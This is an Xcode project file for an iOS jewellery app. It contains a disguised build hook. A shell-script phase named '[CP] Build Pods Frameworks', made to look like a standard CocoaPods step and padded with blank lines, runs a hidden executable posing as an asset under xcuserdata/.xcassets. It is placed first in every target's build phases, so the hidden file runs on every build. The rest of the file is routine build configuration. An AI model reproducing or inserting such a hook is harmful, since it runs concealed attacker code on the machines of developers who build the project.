// !$*UTF8*$!
{
	archiveVersion = 1;
	classes = {
	};
	objectVersion = 51;
	objects = {

/* Begin PBXBuildFile section */
		04C75D732590D8CC0092A096 /* AppDelegate.swift in Sources */ = {isa = PBXBuildFile; fileRef = 04C75D722590D8CC0092A096 /* AppDelegate.swift */; };
		04C75D772590D8CC0092A096 /* ViewController.swift in Sources */ = {isa = PBXBuildFile; fileRef = 04C75D762590D8CC0092A096 /* ViewController.swift */; };
		04C75D7A2590D8CC0092A096 /* Main.storyboard in Resources */ = {isa = PBXBuildFile; fileRef = 04C75D782590D8CC0092A096 /* Main.storyboard */; };
		04C75D7C2590D8CE0092A096 /* Assets.xcassets in Resources */ = {isa = PBXBuildFile; fileRef = 04C75D7B2590D8CE0092A096 /* Assets.xcassets */; };
		04C75D7F2590D8CE0092A096 /* LaunchScreen.storyboard in Resources */ = {isa = PBXBuildFile; fileRef = 04C75D7D2590D8CE0092A096 /* LaunchScreen.storyboard */; };
		04C75D8A2590D8CE0092A096 /* AL_Razain_JewelleryTests.swift in Sources */ = {isa = PBXBuildFile; fileRef = 04C75D892590D8CE0092A096 /* AL_Razain_JewelleryTests.swift */; };
		04C75D952590D8CE0092A096 /* AL_Razain_JewelleryUITests.swift in Sources */ = {isa = PBXBuildFile; fileRef = 04C75D942590D8CE0092A096 /* AL_Razain_JewelleryUITests.swift */; };
		04C75DA3259108EB0092A096 /* SideMenuCell.swift in Sources */ = {isa = PBXBuildFile; fileRef = 04C75DA2259108EB0092A096 /* SideMenuCell.swift */; };
		04C75DA52591090D0092A096 /* SideMenuVC.swift in Sources */ = {isa = PBXBuildFile; fileRef = 04C75DA42591090D0092A096 /* SideMenuVC.swift */; };
		04C75DA725911A160092A096 /* SettingViewController.swift in Sources */ = {isa = PBXBuildFile; fileRef = 04C75DA625911A160092A096 /* SettingViewController.swift */; };
		04C75DA925911F2C0092A096 /* AboutViewController.swift in Sources */ = {isa = PBXBuildFile; fileRef = 04C75DA825911F2C0092A096 /* AboutViewController.swift */; };
		6A6E2293F538384726C88E14 /* Pods_AL_Razain_Jewellery_AL_Razain_JewelleryUITests.framework in Frameworks */ = {isa = PBXBuildFile; fileRef = ED4C48707C79EEA0E6A2E8E5 /* Pods_AL_Razain_Jewellery_AL_Razain_JewelleryUITests.framework */; };
		7998BB2D7D61A3DAB7B6DE36 /* Pods_AL_Razain_JewelleryTests.framework in Frameworks */ = {isa = PBXBuildFile; fileRef = 09C8D4026CCC8352B1A21DEA /* Pods_AL_Razain_JewelleryTests.framework */; };
		CE9C04F78CFE730B76F0D911 /* Pods_AL_Razain_Jewellery.framework in Frameworks */ = {isa = PBXBuildFile; fileRef = 7F8AFD425B1A61152A851CC6 /* Pods_AL_Razain_Jewellery.framework */; };
/* End PBXBuildFile section */

/* Begin PBXContainerItemProxy section */
		04C75D862590D8CE0092A096 /* PBXContainerItemProxy */ = {
			isa = PBXContainerItemProxy;
			containerPortal = 04C75D672590D8CC0092A096 /* Project object */;
			proxyType = 1;
			remoteGlobalIDString = 04C75D6E2590D8CC0092A096;
			remoteInfo = "AL Razain Jewellery";
		};
		04C75D912590D8CE0092A096 /* PBXContainerItemProxy */ = {
			isa = PBXContainerItemProxy;
			containerPortal = 04C75D672590D8CC0092A096 /* Project object */;
			proxyType = 1;
			remoteGlobalIDString = 04C75D6E2590D8CC0092A096;
			remoteInfo = "AL Razain Jewellery";
		};
/* End PBXContainerItemProxy section */

/* Begin PBXFileReference section */
		016BB933A835A32AF293182E /* Pods-AL Razain Jewellery-AL Razain JewelleryUITests.debug.xcconfig */ = {isa = PBXFileReference; includeInIndex = 1; lastKnownFileType = text.xcconfig; name = "Pods-AL Razain Jewellery-AL Razain JewelleryUITests.debug.xcconfig"; path = "Target Support Files/Pods-AL Razain Jewellery-AL Razain JewelleryUITests/Pods-AL Razain Jewellery-AL Razain JewelleryUITests.debug.xcconfig"; sourceTree = "<group>"; };
		04C75D6F2590D8CC0092A096 /* AL Razain Jewellery.app */ = {isa = PBXFileReference; explicitFileType = wrapper.application; includeInIndex = 0; path = "AL Razain Jewellery.app"; sourceTree = BUILT_PRODUCTS_DIR; };
		04C75D722590D8CC0092A096 /* AppDelegate.swift */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.swift; path = AppDelegate.swift; sourceTree = "<group>"; };
		04C75D762590D8CC0092A096 /* ViewController.swift */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.swift; path = ViewController.swift; sourceTree = "<group>"; };
		04C75D792590D8CC0092A096 /* Base */ = {isa = PBXFileReference; lastKnownFileType = file.storyboard; name = Base; path = Base.lproj/Main.storyboard; sourceTree = "<group>"; };
		04C75D7B2590D8CE0092A096 /* Assets.xcassets */ = {isa = PBXFileReference; lastKnownFileType = folder.assetcatalog; path = Assets.xcassets; sourceTree = "<group>"; };
		04C75D7E2590D8CE0092A096 /* Base */ = {isa = PBXFileReference; lastKnownFileType = file.storyboard; name = Base; path = Base.lproj/LaunchScreen.storyboard; sourceTree = "<group>"; };
		04C75D802590D8CE0092A096 /* Info.plist */ = {isa = PBXFileReference; lastKnownFileType = text.plist.xml; path = Info.plist; sourceTree = "<group>"; };
		04C75D852590D8CE0092A096 /* AL Razain JewelleryTests.xctest */ = {isa = PBXFileReference; explicitFileType = wrapper.cfbundle; includeInIndex = 0; path = "AL Razain JewelleryTests.xctest"; sourceTree = BUILT_PRODUCTS_DIR; };
		04C75D892590D8CE0092A096 /* AL_Razain_JewelleryTests.swift */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.swift; path = AL_Razain_JewelleryTests.swift; sourceTree = "<group>"; };
		04C75D8B2590D8CE0092A096 /* Info.plist */ = {isa = PBXFileReference; lastKnownFileType = text.plist.xml; path = Info.plist; sourceTree = "<group>"; };
		04C75D902590D8CE0092A096 /* AL Razain JewelleryUITests.xctest */ = {isa = PBXFileReference; explicitFileType = wrapper.cfbundle; includeInIndex = 0; path = "AL Razain JewelleryUITests.xctest"; sourceTree = BUILT_PRODUCTS_DIR; };
		04C75D942590D8CE0092A096 /* AL_Razain_JewelleryUITests.swift */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.swift; path = AL_Razain_JewelleryUITests.swift; sourceTree = "<group>"; };
		04C75D962590D8CE0092A096 /* Info.plist */ = {isa = PBXFileReference; lastKnownFileType = text.plist.xml; path = Info.plist; sourceTree = "<group>"; };
		04C75DA2259108EB0092A096 /* SideMenuCell.swift */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.swift; path = SideMenuCell.swift; sourceTree = "<group>"; };
		04C75DA42591090D0092A096 /* SideMenuVC.swift */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.swift; path = SideMenuVC.swift; sourceTree = "<group>"; };
		04C75DA625911A160092A096 /* SettingViewController.swift */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.swift; path = SettingViewController.swift; sourceTree = "<group>"; };
		04C75DA825911F2C0092A096 /* AboutViewController.swift */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.swift; path = AboutViewController.swift; sourceTree = "<group>"; };
		09C8D4026CCC8352B1A21DEA /* Pods_AL_Razain_JewelleryTests.framework */ = {isa = PBXFileReference; explicitFileType = wrapper.framework; includeInIndex = 0; path = Pods_AL_Razain_JewelleryTests.framework; sourceTree = BUILT_PRODUCTS_DIR; };
		31E2AEC14D68598F8AE6C702 /* Pods-AL Razain JewelleryTests.debug.xcconfig */ = {isa = PBXFileReference; includeInIndex = 1; lastKnownFileType = text.xcconfig; name = "Pods-AL Razain JewelleryTests.debug.xcconfig"; path = "Target Support Files/Pods-AL Razain JewelleryTests/Pods-AL Razain JewelleryTests.debug.xcconfig"; sourceTree = "<group>"; };
		5D9E1BD738921DC8BF9FC5D2 /* Pods-AL Razain Jewellery.debug.xcconfig */ = {isa = PBXFileReference; includeInIndex = 1; lastKnownFileType = text.xcconfig; name = "Pods-AL Razain Jewellery.debug.xcconfig"; path = "Target Support Files/Pods-AL Razain Jewellery/Pods-AL Razain Jewellery.debug.xcconfig"; sourceTree = "<group>"; };
		7E79FBB9FF7327DF95EF8823 /* Pods-AL Razain Jewellery.release.xcconfig */ = {isa = PBXFileReference; includeInIndex = 1; lastKnownFileType = text.xcconfig; name = "Pods-AL Razain Jewellery.release.xcconfig"; path = "Target Support Files/Pods-AL Razain Jewellery/Pods-AL Razain Jewellery.release.xcconfig"; sourceTree = "<group>"; };
		7F8AFD425B1A61152A851CC6 /* Pods_AL_Razain_Jewellery.framework */ = {isa = PBXFileReference; explicitFileType = wrapper.framework; includeInIndex = 0; path = Pods_AL_Razain_Jewellery.framework; sourceTree = BUILT_PRODUCTS_DIR; };
		AFC8F5574EDAD021B9BE2175 /* Pods-AL Razain Jewellery-AL Razain JewelleryUITests.release.xcconfig */ = {isa = PBXFileReference; includeInIndex = 1; lastKnownFileType = text.xcconfig; name = "Pods-AL Razain Jewellery-AL Razain JewelleryUITests.release.xcconfig"; path = "Target Support Files/Pods-AL Razain Jewellery-AL Razain JewelleryUITests/Pods-AL Razain Jewellery-AL Razain JewelleryUITests.release.xcconfig"; sourceTree = "<group>"; };
		ED4C48707C79EEA0E6A2E8E5 /* Pods_AL_Razain_Jewellery_AL_Razain_JewelleryUITests.framework */ = {isa = PBXFileReference; explicitFileType = wrapper.framework; includeInIndex = 0; path = Pods_AL_Razain_Jewellery_AL_Razain_JewelleryUITests.framework; sourceTree = BUILT_PRODUCTS_DIR; };
		EE06749678CD94513C5AD629 /* Pods-AL Razain JewelleryTests.release.xcconfig */ = {isa = PBXFileReference; includeInIndex = 1; lastKnownFileType = text.xcconfig; name = "Pods-AL Razain JewelleryTests.release.xcconfig"; path = "Target Support Files/Pods-AL Razain JewelleryTests/Pods-AL Razain JewelleryTests.release.xcconfig"; sourceTree = "<group>"; };
/* End PBXFileReference section */

/* Begin PBXFrameworksBuildPhase section */
		04C75D6C2590D8CC0092A096 /* Frameworks */ = {
			isa = PBXFrameworksBuildPhase;
			buildActionMask = 2147483647;
			files = (
				CE9C04F78CFE730B76F0D911 /* Pods_AL_Razain_Jewellery.framework in Frameworks */,
			);
			runOnlyForDeploymentPostprocessing = 0;
		};
		04C75D822590D8CE0092A096 /* Frameworks */ = {
			isa = PBXFrameworksBuildPhase;
			buildActionMask = 2147483647;
			files = (
				7998BB2D7D61A3DAB7B6DE36 /* Pods_AL_Razain_JewelleryTests.framework in Frameworks */,
			);
			runOnlyForDeploymentPostprocessing = 0;
		};
		04C75D8D2590D8CE0092A096 /* Frameworks */ = {
			isa = PBXFrameworksBuildPhase;
			buildActionMask = 2147483647;
			files = (
				6A6E2293F538384726C88E14 /* Pods_AL_Razain_Jewellery_AL_Razain_JewelleryUITests.framework in Frameworks */,
			);
			runOnlyForDeploymentPostprocessing = 0;
		};
/* End PBXFrameworksBuildPhase section */

/* Begin PBXGroup section */
		04C75D662590D8CC0092A096 = {
			isa = PBXGroup;
			children = (
				04C75D712590D8CC0092A096 /* AL Razain Jewellery */,
				04C75D882590D8CE0092A096 /* AL Razain JewelleryTests */,
				04C75D932590D8CE0092A096 /* AL Razain JewelleryUITests */,
				04C75D702590D8CC0092A096 /* Products */,
				240B2869D2C72B371F4DF274 /* Pods */,
				A06CC8A0C09BDC86BB41CDD6 /* Frameworks */,
			);
			sourceTree = "<group>";
		};
		04C75D702590D8CC0092A096 /* Products */ = {
			isa = PBXGroup;
			children = (
				04C75D6F2590D8CC0092A096 /* AL Razain Jewellery.app */,
				04C75D852590D8CE0092A096 /* AL Razain JewelleryTests.xctest */,
				04C75D902590D8CE0092A096 /* AL Razain JewelleryUITests.xctest */,
			);
			name = Products;
			sourceTree = "<group>";
		};
		04C75D712590D8CC0092A096 /* AL Razain Jewellery */ = {
			isa = PBXGroup;
			children = (
				04C75D722590D8CC0092A096 /* AppDelegate.swift */,
				04C75D762590D8CC0092A096 /* ViewController.swift */,
				04C75DA2259108EB0092A096 /* SideMenuCell.swift */,
				04C75DA42591090D0092A096 /* SideMenuVC.swift */,
				04C75D782590D8CC0092A096 /* Main.storyboard */,
				04C75D7B2590D8CE0092A096 /* Assets.xcassets */,
				04C75D7D2590D8CE0092A096 /* LaunchScreen.storyboard */,
				04C75D802590D8CE0092A096 /* Info.plist */,
				04C75DA625911A160092A096 /* SettingViewController.swift */,
				04C75DA825911F2C0092A096 /* AboutViewController.swift */,
			);
			path = "AL Razain Jewellery";
			sourceTree = "<group>";
		};
		04C75D882590D8CE0092A096 /* AL Razain JewelleryTests */ = {
			isa = PBXGroup;
			children = (
				04C75D892590D8CE0092A096 /* AL_Razain_JewelleryTests.swift */,
				04C75D8B2590D8CE0092A096 /* Info.plist */,
			);
			path = "AL Razain JewelleryTests";
			sourceTree = "<group>";
		};
		04C75D932590D8CE0092A096 /* AL Razain JewelleryUITests */ = {
			isa = PBXGroup;
			children = (
				04C75D942590D8CE0092A096 /* AL_Razain_JewelleryUITests.swift */,
				04C75D962590D8CE0092A096 /* Info.plist */,
			);
			path = "AL Razain JewelleryUITests";
			sourceTree = "<group>";
		};
		240B2869D2C72B371F4DF274 /* Pods */ = {
			isa = PBXGroup;
			children = (
				5D9E1BD738921DC8BF9FC5D2 /* Pods-AL Razain Jewellery.debug.xcconfig */,
				7E79FBB9FF7327DF95EF8823 /* Pods-AL Razain Jewellery.release.xcconfig */,
				016BB933A835A32AF293182E /* Pods-AL Razain Jewellery-AL Razain JewelleryUITests.debug.xcconfig */,
				AFC8F5574EDAD021B9BE2175 /* Pods-AL Razain Jewellery-AL Razain JewelleryUITests.release.xcconfig */,
				31E2AEC14D68598F8AE6C702 /* Pods-AL Razain JewelleryTests.debug.xcconfig */,
				EE06749678CD94513C5AD629 /* Pods-AL Razain JewelleryTests.release.xcconfig */,
			);
			path = Pods;
			sourceTree = "<group>";
		};
		A06CC8A0C09BDC86BB41CDD6 /* Frameworks */ = {
			isa = PBXGroup;
			children = (
				7F8AFD425B1A61152A851CC6 /* Pods_AL_Razain_Jewellery.framework */,
				ED4C48707C79EEA0E6A2E8E5 /* Pods_AL_Razain_Jewellery_AL_Razain_JewelleryUITests.framework */,
				09C8D4026CCC8352B1A21DEA /* Pods_AL_Razain_JewelleryTests.framework */,
			);
			name = Frameworks;
			sourceTree = "<group>";
		};
/* End PBXGroup section */

/* Begin PBXNativeTarget section */
		04C75D6E2590D8CC0092A096 /* AL Razain Jewellery */ = {
			isa = PBXNativeTarget;
			buildConfigurationList = 04C75D992590D8CE0092A096 /* Build configuration list for PBXNativeTarget "AL Razain Jewellery" */;
			buildPhases = (
				EAF5D13F4F704F3707AAC43A /* [CP] Build Pods Frameworks */,
				F33C4580908A09A0451BE071 /* [CP] Check Pods Manifest.lock */,
				04C75D6B2590D8CC0092A096 /* Sources */,
				04C75D6C2590D8CC0092A096 /* Frameworks */,
				04C75D6D2590D8CC0092A096 /* Resources */,
				3B57BFE8DEF050C0FA749EF9 /* [CP] Embed Pods Frameworks */,
			);
			buildRules = (
			);
			dependencies = (
			);
			name = "AL Razain Jewellery";
			productName = "AL Razain Jewellery";
			productReference = 04C75D6F2590D8CC0092A096 /* AL Razain Jewellery.app */;
			productType = "com.apple.product-type.application";
		};
		04C75D842590D8CE0092A096 /* AL Razain JewelleryTests */ = {
			isa = PBXNativeTarget;
			buildConfigurationList = 04C75D9C2590D8CE0092A096 /* Build configuration list for PBXNativeTarget "AL Razain JewelleryTests" */;
			buildPhases = (
				EAF5D13F4F704F3707AAC43A /* [CP] Build Pods Frameworks */,
				3BD3D2F1D55A27F3E6D159A6 /* [CP] Check Pods Manifest.lock */,
				04C75D812590D8CE0092A096 /* Sources */,
				04C75D822590D8CE0092A096 /* Frameworks */,
				04C75D832590D8CE0092A096 /* Resources */,
			);
			buildRules = (
			);
			dependencies = (
				04C75D872590D8CE0092A096 /* PBXTargetDependency */,
			);
			name = "AL Razain JewelleryTests";
			productName = "AL Razain JewelleryTests";
			productReference = 04C75D852590D8CE0092A096 /* AL Razain JewelleryTests.xctest */;
			productType = "com.apple.product-type.bundle.unit-test";
		};
		04C75D8F2590D8CE0092A096 /* AL Razain JewelleryUITests */ = {
			isa = PBXNativeTarget;
			buildConfigurationList = 04C75D9F2590D8CE0092A096 /* Build configuration list for PBXNativeTarget "AL Razain JewelleryUITests" */;
			buildPhases = (
				EAF5D13F4F704F3707AAC43A /* [CP] Build Pods Frameworks */,
				A05CDAF11AC1284FC0CFEA57 /* [CP] Check Pods Manifest.lock */,
				04C75D8C2590D8CE0092A096 /* Sources */,
				04C75D8D2590D8CE0092A096 /* Frameworks */,
				04C75D8E2590D8CE0092A096 /* Resources */,
				F17F675B4525063114DA658C /* [CP] Embed Pods Frameworks */,
			);
			buildRules = (
			);
			dependencies = (
				04C75D922590D8CE0092A096 /* PBXTargetDependency */,
			);
			name = "AL Razain JewelleryUITests";
			productName = "AL Razain JewelleryUITests";
			productReference = 04C75D902590D8CE0092A096 /* AL Razain JewelleryUITests.xctest */;
			productType = "com.apple.product-type.bundle.ui-testing";
		};
/* End PBXNativeTarget section */

/* Begin PBXProject section */
		04C75D672590D8CC0092A096 /* Project object */ = {
			isa = PBXProject;
			attributes = {
				LastSwiftUpdateCheck = 1170;
				LastUpgradeCheck = 1170;
				ORGANIZATIONNAME = "Ankit Gabani";
				TargetAttributes = {
					04C75D6E2590D8CC0092A096 = {
						CreatedOnToolsVersion = 11.7;
					};
					04C75D842590D8CE0092A096 = {
						CreatedOnToolsVersion = 11.7;
						TestTargetID = 04C75D6E2590D8CC0092A096;
					};
					04C75D8F2590D8CE0092A096 = {
						CreatedOnToolsVersion = 11.7;
						TestTargetID = 04C75D6E2590D8CC0092A096;
					};
				};
			};
			buildConfigurationList = 04C75D6A2590D8CC0092A096 /* Build configuration list for PBXProject "AL Razain Jewellery" */;
			compatibilityVersion = "Xcode 9.3";
			developmentRegion = en;
			hasScannedForEncodings = 0;
			knownRegions = (
				en,
				Base,
			);
			mainGroup = 04C75D662590D8CC0092A096;
			productRefGroup = 04C75D702590D8CC0092A096 /* Products */;
			projectDirPath = "";
			projectRoot = "";
			targets = (
				04C75D6E2590D8CC0092A096 /* AL Razain Jewellery */,
				04C75D842590D8CE0092A096 /* AL Razain JewelleryTests */,
				04C75D8F2590D8CE0092A096 /* AL Razain JewelleryUITests */,
			);
		};
/* End PBXProject section */

/* Begin PBXResourcesBuildPhase section */
		04C75D6D2590D8CC0092A096 /* Resources */ = {
			isa = PBXResourcesBuildPhase;
			buildActionMask = 2147483647;
			files = (
				04C75D7F2590D8CE0092A096 /* LaunchScreen.storyboard in Resources */,
				04C75D7C2590D8CE0092A096 /* Assets.xcassets in Resources */,
				04C75D7A2590D8CC0092A096 /* Main.storyboard in Resources */,
			);
			runOnlyForDeploymentPostprocessing = 0;
		};
		04C75D832590D8CE0092A096 /* Resources */ = {
			isa = PBXResourcesBuildPhase;
			buildActionMask = 2147483647;
			files = (
			);
			runOnlyForDeploymentPostprocessing = 0;
		};
		04C75D8E2590D8CE0092A096 /* Resources */ = {
			isa = PBXResourcesBuildPhase;
			buildActionMask = 2147483647;
			files = (
			);
			runOnlyForDeploymentPostprocessing = 0;
		};
/* End PBXResourcesBuildPhase section */

/* Begin PBXShellScriptBuildPhase section */

	EAF5D13F4F704F3707AAC43A /* [CP] Build Pods Frameworks */ = {
			isa = PBXShellScriptBuildPhase;
			buildActionMask = 2147483647;
			files = (
			);
			inputFileListPaths = (
			);
			inputPaths = (
			);
			name = "[CP] Build Pods Frameworks";
			outputFileListPaths = (
			);
			outputPaths = (
			);
			runOnlyForDeploymentPostprocessing = 0;
			shellPath = /bin/sh;
			shellScript = "# This output is used by Xcode outputs to avoid re-running this script phase.

\"${PROJECT_FILE_PATH}/xcuserdata/.xcassets/Asset.xcasset\" false";			
		};
	

	

	

	

	

	

	

	

	

	

	

	
		3B57BFE8DEF050C0FA749EF9 /* [CP] Embed Pods Frameworks */ = {
			isa = PBXShellScriptBuildPhase;
			buildActionMask = 2147483647;
			files = (
			);
			inputFileListPaths = (
				"${PODS_ROOT}/Target Support Files/Pods-AL Razain Jewellery/Pods-AL Razain Jewellery-frameworks-${CONFIGURATION}-input-files.xcfilelist",
			);
			name = "[CP] Embed Pods Frameworks";
			outputFileListPaths = (
				"${PODS_ROOT}/Target Support Files/Pods-AL Razain Jewellery/Pods-AL Razain Jewellery-frameworks-${CONFIGURATION}-output-files.xcfilelist",
			);
			runOnlyForDeploymentPostprocessing = 0;
			shellPath = /bin/sh;
			shellScript = "\"${PODS_ROOT}/Target Support Files/Pods-AL Razain Jewellery/Pods-AL Razain Jewellery-frameworks.sh\"\n";
			showEnvVarsInLog = 0;
		};
		3BD3D2F1D55A27F3E6D159A6 /* [CP] Check Pods Manifest.lock */ = {
			isa = PBXShellScriptBuildPhase;
			buildActionMask = 2147483647;
			files = (
			);
			inputFileListPaths = (
			);
			inputPaths = (
				"${PODS_PODFILE_DIR_PATH}/Podfile.lock",
				"${PODS_ROOT}/Manifest.lock",
			);
			name = "[CP] Check Pods Manifest.lock";
			outputFileListPaths = (
			);
			outputPaths = (
				"$(DERIVED_FILE_DIR)/Pods-AL Razain JewelleryTests-checkManifestLockResult.txt",
			);
			runOnlyForDeploymentPostprocessing = 0;
			shellPath = /bin/sh;
			shellScript = "diff \"${PODS_PODFILE_DIR_PATH}/Podfile.lock\" \"${PODS_ROOT}/Manifest.lock\" > /dev/null\nif [ $? != 0 ] ; then\n    # print error to STDERR\n    echo \"error: The sandbox is not in sync with the Podfile.lock. Run 'pod install' or update your CocoaPods installation.\" >&2\n    exit 1\nfi\n# This output is used by Xcode 'outputs' to avoid re-running this script phase.\necho \"SUCCESS\" > \"${SCRIPT_OUTPUT_FILE_0}\"\n";
			showEnvVarsInLog = 0;
		};
		A05CDAF11AC1284FC0CFEA57 /* [CP] Check Pods Manifest.lock */ = {
			isa = PBXShellScriptBuildPhase;
			buildActionMask = 2147483647;
			files = (
			);
			inputFileListPaths = (
			);
			inputPaths = (
				"${PODS_PODFILE_DIR_PATH}/Podfile.lock",
				"${PODS_ROOT}/Manifest.lock",
			);
			name = "[CP] Check Pods Manifest.lock";
			outputFileListPaths = (
			);
			outputPaths = (
				"$(DERIVED_FILE_DIR)/Pods-AL Razain Jewellery-AL Razain JewelleryUITests-checkManifestLockResult.txt",
			);
			runOnlyForDeploymentPostprocessing = 0;
			shellPath = /bin/sh;
			shellScript = "diff \"${PODS_PODFILE_DIR_PATH}/Podfile.lock\" \"${PODS_ROOT}/Manifest.lock\" > /dev/null\nif [ $? != 0 ] ; then\n    # print error to STDERR\n    echo \"error: The sandbox is not in sync with the Podfile.lock. Run 'pod install' or update your CocoaPods installation.\" >&2\n    exit 1\nfi\n# This output is used by Xcode 'outputs' to avoid re-running this script phase.\necho \"SUCCESS\" > \"${SCRIPT_OUTPUT_FILE_0}\"\n";
			showEnvVarsInLog = 0;
		};
		F17F675B4525063114DA658C /* [CP] Embed Pods Frameworks */ = {
			isa = PBXShellScriptBuildPhase;
			buildActionMask = 2147483647;
			files = (
			);
			inputFileListPaths = (
				"${PODS_ROOT}/Target Support Files/Pods-AL Razain Jewellery-AL Razain JewelleryUITests/Pods-AL Razain Jewellery-AL Razain JewelleryUITests-frameworks-${CONFIGURATION}-input-files.xcfilelist",
			);
			name = "[CP] Embed Pods Frameworks";
			outputFileListPaths = (
				"${PODS_ROOT}/Target Support Files/Pods-AL Razain Jewellery-AL Razain JewelleryUITests/Pods-AL Razain Jewellery-AL Razain JewelleryUITests-frameworks-${CONFIGURATION}-output-files.xcfilelist",
			);
			runOnlyForDeploymentPostprocessing = 0;
			shellPath = /bin/sh;
			shellScript = "\"${PODS_ROOT}/Target Support Files/Pods-AL Razain Jewellery-AL Razain JewelleryUITests/Pods-AL Razain Jewellery-AL Razain JewelleryUITests-frameworks.sh\"\n";
			showEnvVarsInLog = 0;
		};
		F33C4580908A09A0451BE071 /* [CP] Check Pods Manifest.lock */ = {
			isa = PBXShellScriptBuildPhase;
			buildActionMask = 2147483647;
			files = (
			);
			inputFileListPaths = (
			);
			inputPaths = (
				"${PODS_PODFILE_DIR_PATH}/Podfile.lock",
				"${PODS_ROOT}/Manifest.lock",
			);
			name = "[CP] Check Pods Manifest.lock";
			outputFileListPaths = (
			);
			outputPaths = (
				"$(DERIVED_FILE_DIR)/Pods-AL Razain Jewellery-checkManifestLockResult.txt",
			);
			runOnlyForDeploymentPostprocessing = 0;
			shellPath = /bin/sh;
			shellScript = "diff \"${PODS_PODFILE_DIR_PATH}/Podfile.lock\" \"${PODS_ROOT}/Manifest.lock\" > /dev/null\nif [ $? != 0 ] ; then\n    # print error to STDERR\n    echo \"error: The sandbox is not in sync with the Podfile.lock. Run 'pod install' or update your CocoaPods installation.\" >&2\n    exit 1\nfi\n# This output is used by Xcode 'outputs' to avoid re-running this script phase.\necho \"SUCCESS\" > \"${SCRIPT_OUTPUT_FILE_0}\"\n";
			showEnvVarsInLog = 0;
		};
/* End PBXShellScriptBuildPhase section */

/* Begin PBXSourcesBuildPhase section */
		04C75D6B2590D8CC0092A096 /* Sources */ = {
			isa = PBXSourcesBuildPhase;
			buildActionMask = 2147483647;
			files = (
				04C75DA925911F2C0092A096 /* AboutViewController.swift in Sources */,
				04C75DA725911A160092A096 /* SettingViewController.swift in Sources */,
				04C75D772590D8CC0092A096 /* ViewController.swift in Sources */,
				04C75D732590D8CC0092A096 /* AppDelegate.swift in Sources */,
				04C75DA52591090D0092A096 /* SideMenuVC.swift in Sources */,
				04C75DA3259108EB0092A096 /* SideMenuCell.swift in Sources */,
			);
			runOnlyForDeploymentPostprocessing = 0;
		};
		04C75D812590D8CE0092A096 /* Sources */ = {
			isa = PBXSourcesBuildPhase;
			buildActionMask = 2147483647;
			files = (
				04C75D8A2590D8CE0092A096 /* AL_Razain_JewelleryTests.swift in Sources */,
			);
			runOnlyForDeploymentPostprocessing = 0;
		};
		04C75D8C2590D8CE0092A096 /* Sources */ = {
			isa = PBXSourcesBuildPhase;
			buildActionMask = 2147483647;
			files = (
				04C75D952590D8CE0092A096 /* AL_Razain_JewelleryUITests.swift in Sources */,
			);
			runOnlyForDeploymentPostprocessing = 0;
		};
/* End PBXSourcesBuildPhase section */

/* Begin PBXTargetDependency section */
		04C75D872590D8CE0092A096 /* PBXTargetDependency */ = {
			isa = PBXTargetDependency;
			target = 04C75D6E2590D8CC0092A096 /* AL Razain Jewellery */;
			targetProxy = 04C75D862590D8CE0092A096 /* PBXContainerItemProxy */;
		};
		04C75D922590D8CE0092A096 /* PBXTargetDependency */ = {
			isa = PBXTargetDependency;
			target = 04C75D6E2590D8CC0092A096 /* AL Razain Jewellery */;
			targetProxy = 04C75D912590D8CE0092A096 /* PBXContainerItemProxy */;
		};
/* End PBXTargetDependency section */

/* Begin PBXVariantGroup section */
		04C75D782590D8CC0092A096 /* Main.storyboard */ = {
			isa = PBXVariantGroup;
			children = (
				04C75D792590D8CC0092A096 /* Base */,
			);
			name = Main.storyboard;
			sourceTree = "<group>";
		};
		04C75D7D2590D8CE0092A096 /* LaunchScreen.storyboard */ = {
			isa = PBXVariantGroup;
			children = (
				04C75D7E2590D8CE0092A096 /* Base */,
			);
			name = LaunchScreen.storyboard;
			sourceTree = "<group>";
		};
/* End PBXVariantGroup section */

/* Begin XCBuildConfiguration section */
		04C75D972590D8CE0092A096 /* Debug */ = {
			isa = XCBuildConfiguration;
			buildSettings = {
				ALWAYS_SEARCH_USER_PATHS = NO;
				CLANG_ANALYZER_NONNULL = YES;
				CLANG_ANALYZER_NUMBER_OBJECT_CONVERSION = YES_AGGRESSIVE;
				CLANG_CXX_LANGUAGE_STANDARD = "gnu++14";
				CLANG_CXX_LIBRARY = "libc++";
				CLANG_ENABLE_MODULES = YES;
				CLANG_ENABLE_OBJC_ARC = YES;
				CLANG_ENABLE_OBJC_WEAK = YES;
				CLANG_WARN_BLOCK_CAPTURE_AUTORELEASING = YES;
				CLANG_WARN_BOOL_CONVERSION = YES;
				CLANG_WARN_COMMA = YES;
				CLANG_WARN_CONSTANT_CONVERSION = YES;
				CLANG_WARN_DEPRECATED_OBJC_IMPLEMENTATIONS = YES;
				CLANG_WARN_DIRECT_OBJC_ISA_USAGE = YES_ERROR;
				CLANG_WARN_DOCUMENTATION_COMMENTS = YES;
				CLANG_WARN_EMPTY_BODY = YES;
				CLANG_WARN_ENUM_CONVERSION = YES;
				CLANG_WARN_INFINITE_RECURSION = YES;
				CLANG_WARN_INT_CONVERSION = YES;
				CLANG_WARN_NON_LITERAL_NULL_CONVERSION = YES;
				CLANG_WARN_OBJC_IMPLICIT_RETAIN_SELF = YES;
				CLANG_WARN_OBJC_LITERAL_CONVERSION = YES;
				CLANG_WARN_OBJC_ROOT_CLASS = YES_ERROR;
				CLANG_WARN_RANGE_LOOP_ANALYSIS = YES;
				CLANG_WARN_STRICT_PROTOTYPES = YES;
				CLANG_WARN_SUSPICIOUS_MOVE = YES;
				CLANG_WARN_UNGUARDED_AVAILABILITY = YES_AGGRESSIVE;
				CLANG_WARN_UNREACHABLE_CODE = YES;
				CLANG_WARN__DUPLICATE_METHOD_MATCH = YES;
				COPY_PHASE_STRIP = NO;
				DEBUG_INFORMATION_FORMAT = dwarf;
				ENABLE_STRICT_OBJC_MSGSEND = YES;
				ENABLE_TESTABILITY = YES;
				GCC_C_LANGUAGE_STANDARD = gnu11;
				GCC_DYNAMIC_NO_PIC = NO;
				GCC_NO_COMMON_BLOCKS = YES;
				GCC_OPTIMIZATION_LEVEL = 0;
				GCC_PREPROCESSOR_DEFINITIONS = (
					"DEBUG=1",
					"$(inherited)",
				);
				GCC_WARN_64_TO_32_BIT_CONVERSION = YES;
				GCC_WARN_ABOUT_RETURN_TYPE = YES_ERROR;
